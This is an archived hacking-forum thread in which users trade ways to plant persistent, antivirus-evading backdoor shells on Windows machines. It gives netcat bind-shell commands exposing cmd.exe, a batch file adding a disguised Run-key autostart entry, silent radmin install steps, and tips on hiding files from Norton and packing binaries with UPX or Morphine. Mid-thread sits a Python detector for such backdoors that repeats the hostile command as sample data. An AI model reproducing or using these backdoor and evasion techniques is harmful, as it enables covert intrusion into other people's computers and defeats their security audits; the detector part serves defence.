Void
Hey guys, need some help. What's the best program to use on a Windows machine that will listen on a certain port, that I can telnet to and get a shell?

I looked into rsh.exe and rshd.exe, haven't had much luck with them. And I also searched this forum, with most results talking about the shell you get after you sploit the box. I need a small DOS prog I can set up as a service that will give me a shell when I telnet to it.

Also encryption and stealth (beating a security audit) are features that would come in handy.

Thanks guys.
SeNe
I think the best one to do this job (because u can configure it the way u want) is winshell 5.0, and the most important thing is that antivirus doesn't seem to detect it.

here u can grab it.

Void
Thanks for the help I'll check it out. It seems Symantec (Norton Anti-Virus) finds it.

http://securityresponse.symantec.com/avcen...shell.50.b.html


Anyone got a shell that isn't classified as a Backdoor trojan, or hack tool?
SeNe
if u upload and execute the file in System Volume Information u can use it without prob because NAV doesn't scan that section by default.
[Sunny]
Netcat ....

nc.exe -l -d -p port -e cmd.exe
krackatoa
Netcat ....

nc.exe -L -d -p port -e cmd.exe

Make it an uppercase "-L" if you want the shell to respawn after you exit
skydance
try icmd.exe, u can setup a pass.... with netcat everyone can connect if they find the port.
Void
damn icmd.exe is detected too. Anyone got some good links to tuts on changing some bytes around to avoid most A/V?
Sparkles
I believe the term is called "packing"; probs the most common packer is upx..
there are other ones; you don't need to compress either, can just encrypt it.
Norton's is getting pretty good with detecting upx'd files too now.. perfect example is sdbot

Sparkles
ssj4conejo
The winshell server maker is detected, but the winshell server itself is not detected. I am on Norton Antivirus 2004 Pro, with the latest definitions, and it doesn't have a clue about the winshell server. Remember that you can make it different sizes.
keith1569
you can also just install radmin which gives u telnet access as an option.. the files you need to upload r
AdmDll.dll
r_server.exe
radmin.reg---you need to get the reg files from your registry

Here are the commands to start it
regedit.exe /s radmin.reg
r_server.exe /install /silence
r_server.exe /start

hope this helped ya
Sparkles
problem with radmin is it's obvious in the services listing (can't remember if you can change it without breaking it)

Sparkles
DocBullus
QUOTE (krackatoa @ Sep 14 2003, 11:40 PM)
Make it a uppercase "-L" if you want the shell to respawn after you exit

Thanks, that helps me out a lot
alpha|beta
Try cryptcat. Should do the job, plus provides point-to-point encryption..
=k3Rn=
so I'll try the radmin. I don't really care if it's listed in the services list.
when u use netcat with the -L option, the port will be open all the time as I understood. How can you hold the backdoor open after a restart?
install that command as a firedaemon service? or is there a better way?
Jay
Can't remember what the tool is called but check out Hacking Exposed Win2k. It's a simple way. Sorry, not much use, my copy is packed away
BlackBoard
hi, I compressed the tool icmd.exe with the upx packer so it wasn't detected anymore by Norton Corporate Edition. can you check if it is also not detected by other virus scanners, thx
http://212.202.50.233:88/icmd.zip

I tested it with 4 email virus scanners, but it wasn't detected.
SNOZZ
Wolf 1.6 from xfocus.org isn't too bad, u can change the service name to whatever u want, have it password controlled, pack it or use a UPX scrambler or Morphine12 to make it undetectable.
cheers
den0m
@SNOZZ:
Also, you can try to find older versions of Wolf. AFAIK some don't get detected at all but they work fine.
boshcash
using packers and morphine and adding-bytes tools, u can make winshell undetected, I did that!
BlackBoard
@ boshcash can you give me that tools?

big thx
UnDeRTaKeR
WinShell 0WNz
Xion
nc is very good
tolf
As per one of the previous posters - cryptcat (nc.exe encrypted) will fulfill your needs:

Can listen on any port or go out on any port.
DES encryption (good for getting around IDS)
Can reverse cmd.exe back as well.. (Good as a back door)

Helloman
QUOTE
As per one of the previous posters - cryptcat (nc.exe encrypted) will fulfill your needs:

Can listen on any port or go out on any port.
DES encryption (good for getting around IDS)
Can reverse cmd.exe back as well.. (Good as a back door)

Thx a lot for this really useful tip.
wh173r
I think the best way to accomplish this is to make a batch calling netcat, and keeping it on a certain port, returning cmd.exe. Someone beat me to posting the code to do it... read up.
saiko13
Some useful replies ... THX
The-X
Norton Antivirus does not detect the server program... it only detects the "builder"

I tried it to detect with NAV 2004 + newest updates
RuFI0
is it possible to bind netcat with flags (nc -L -p <port> -e cmd.exe -d -vv) to an exe file using upx?
skorpio
netcat is great, but I don't know a method to install netcat as a service.

If u use the flag -L, u can enter the server until the server is restarted...

does nobody know a method to install a service for netcat?

bye and sorry for my english
RuFI0
but what if i bind netcat with the exe file and also bind a batch file to install netcat? In other words, bind both netcat and the batch file together with the exe file?
dozolax
yea... netcat is probably the best idea
woodpecker_sjtu
nc is the greatest
n3mesis
If you want encryption then you could use cryptcat, which is basically exactly the same as netcat, but encrypted
Fareway
netcat is like a swiss army knife !
agamemnon
Grrrr, you CAN give netcat a password!!

Take a look at this post: Giving Netcat Password Functionality

(I do admit however, that it might not be the easiest of things.)

-ed.

Fractured
Everyone keeps talking about a tool called Morphine to encrypt files, but I can't seem to find it anywhere. All I get in google are performance enhancing drugs. =P

Where might it be?
h3llraz0r
a simple way to make netcat run at every startup is to make a batch file with the code below

CODE

@echo off
move nc.exe %systemroot%\system32
move reg.exe %systemroot%\system32
start %systemroot%\system32\nc.exe -L -d -e cmd.exe -p 69
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v Rundllcms /t REG_SZ  /d "%systemroot%\system32\nc.exe -L -d -e cmd.exe -p 69"
exit


change the port to whatever you want and you can change Rundllcms to the name you want for the registry entry

hope this helps some of ya
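The Run-key entry this batch file writes, and the listening netcat commands earlier in the thread (nc.exe -L -d -e cmd.exe -p port), are exactly what a host audit should pick up. Below is an added example, not code from any poster: a Python script that parses constructed `reg query` and `netstat -ano` output and flags autostart values that launch a known shell tool, bind a port, or hand cmd.exe to a socket, plus listening TCP ports owned by a process outside an expected baseline. The sample output, the PID-to-image map, the baseline set and the tool-name list are constructed assumptions for the demo.

```python
import re

# Constructed sample of `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
# output (not taken from the thread); the second value is the kind of autostart
# entry the batch file above creates.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SoundMan    REG_SZ    SOUNDMAN.EXE
    Rundllcms    REG_SZ    C:\WINDOWS\system32\nc.exe -L -d -e cmd.exe -p 69
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
"""

# Constructed sample of `netstat -ano` output, and the PID -> image map that
# `tasklist` would give on the same (hypothetical) host.
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       900
  TCP    0.0.0.0:69             0.0.0.0:0              LISTENING       1532
  TCP    192.168.1.5:139        0.0.0.0:0              LISTENING       4
  TCP    192.168.1.5:1029       10.0.0.9:80            ESTABLISHED     1204
"""
SAMPLE_PID_TO_IMAGE = {4: "System", 900: "svchost.exe", 1204: "iexplore.exe", 1532: "nc.exe"}

# Assumed baseline: images allowed to hold listening TCP sockets on this host.
EXPECTED_LISTENER_IMAGES = {"System", "svchost.exe", "lsass.exe", "alg.exe"}

# Shell tools named in the thread; an autostart value launching one is worth a look.
KNOWN_SHELL_TOOLS = {"nc.exe", "cryptcat.exe", "icmd.exe", "srvcmd.exe"}

REG_VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_[A-Z_]+)\s{2,}(?P<data>.*)$")
# netcat-style "-e cmd.exe": hands a command interpreter to whoever connects.
EXEC_SHELL_RE = re.compile(r"(?<!\S)-e\s+(?:\S*\\)?(?:cmd\.exe|command\.com)(?!\S)", re.IGNORECASE)
LISTEN_FLAG_RE = re.compile(r"(?<!\S)-[lL](?!\S)")
PORT_FLAG_RE = re.compile(r"(?<!\S)-p\s+(\d{1,5})(?!\S)")
NETSTAT_LISTEN_RE = re.compile(r"^\s*TCP\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+LISTENING\s+(?P<pid>\d+)\s*$")


def parse_reg_query(text):
    """Return (name, type, data) for every value line in `reg query` output."""
    entries = []
    for line in text.splitlines():
        m = REG_VALUE_RE.match(line)
        if m:
            entries.append((m["name"], m["type"], m["data"].strip()))
    return entries


def launched_image(command):
    """Basename of the executable a Run value launches (handles quoted paths)."""
    command = command.strip()
    if command.startswith('"'):
        head = command[1:].split('"', 1)[0]
    else:
        head = command.split()[0] if command else ""
    return head.rsplit("\\", 1)[-1].lower()


def suspicious_run_entries(reg_text):
    """Flag Run values that start a known shell tool, bind a port, or expose cmd.exe."""
    findings = []
    for name, _rtype, data in parse_reg_query(reg_text):
        reasons = []
        image = launched_image(data)
        if image in KNOWN_SHELL_TOOLS:
            reasons.append(f"launches {image}")
        if EXEC_SHELL_RE.search(data):
            reasons.append("hands cmd.exe to a network connection (-e cmd.exe)")
        port = PORT_FLAG_RE.search(data)
        if LISTEN_FLAG_RE.search(data) and port:
            reasons.append(f"listens on TCP port {int(port.group(1))}")
        if reasons:
            findings.append({"name": name, "data": data, "reasons": reasons})
    return findings


def unexpected_listeners(netstat_text, pid_to_image, expected=EXPECTED_LISTENER_IMAGES):
    """Return (port, pid, image) for listening TCP sockets owned by a non-baseline image."""
    hits = []
    for line in netstat_text.splitlines():
        m = NETSTAT_LISTEN_RE.match(line)
        if not m:
            continue
        pid = int(m["pid"])
        image = pid_to_image.get(pid, "<unknown>")
        if image not in expected:
            hits.append((int(m["port"]), pid, image))
    return hits


if __name__ == "__main__":
    for f in suspicious_run_entries(SAMPLE_REG_QUERY):
        print(f"Run value {f['name']!r}: {'; '.join(f['reasons'])}\n    {f['data']}")
    for port, pid, image in unexpected_listeners(SAMPLE_NETSTAT, SAMPLE_PID_TO_IMAGE):
        print(f"TCP port {port} is held by PID {pid} ({image}), not in the baseline")
```

Run it against real output by piping `reg query` and `netstat -ano` into files and reading them in place of the constructed strings; the value-name check (Rundllcms imitating a system name) is deliberately not used as a signal, since a renamed binary still has to bind a port and hand out a shell, and those are what the regexes and the port baseline catch.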
T-BoNe
edit
nvm
iLLuSioN
I'm having trouble with winshell, I actually don't know how to login. I have netcat working well and as a service but I want to get things more secure.. I install it and start the service but how do I login? I see the C:\>telnet xxx.xxx.xxx.xxx 5277 but it can't connect; when I put in the IP Windows gives me an error.. I don't have a telnet either, is that it? I'm lost, please help
iLLuSioN
oops sorry for the dumb post ^^ I got it working, I'm a total newb
passi
I use srvcmd.exe, but there is no password protection. It runs hidden and you can choose the port where you want to connect to via telnet.
LittleHacker
http://www.free-host.com is Defaced!

< Sorry But I can not add a new topic yet! >
skorpio
passi, but how is your program used??

what is the exact command?

thx u bye
ganz2
I've had some success with this.
Progressor
QUOTE (Fractured @ Dec 22 2003, 08:28 AM)
Everyone keeps talking about a tool called Morphine to encrypt files, but I can't seem to find it anywhere. All I get in google are performance enhancing drugs. =P

Where might it be?
boshcash
I noticed that the link above is a dead link, anyone who can't find morphine tell me
zero-maitimax
can ppl just put the file in the posting, it is easier for ppl
headbanger
i would suggest radmin, its very useful

like a lot of ppl said.. netcat is pretty good
KoNh
QUOTE (boshcash @ Jan 5 2004, 02:46 PM)
I noticed that the link above is a dead link, anyone who can't find morphine tell me

geee just open yer eyes ... look

http://rootkit.host.sk/tools/Morphine12.zip

file doesn't download but hell you need it so bad that you try:

http://rootkit.host.sk/tools/

OHH a web page, ohh there are also links on that page !!!! clap clap *applause* !!! you made it !!!
Invision Power Board © 2001-2005 Invision Power Services, Inc.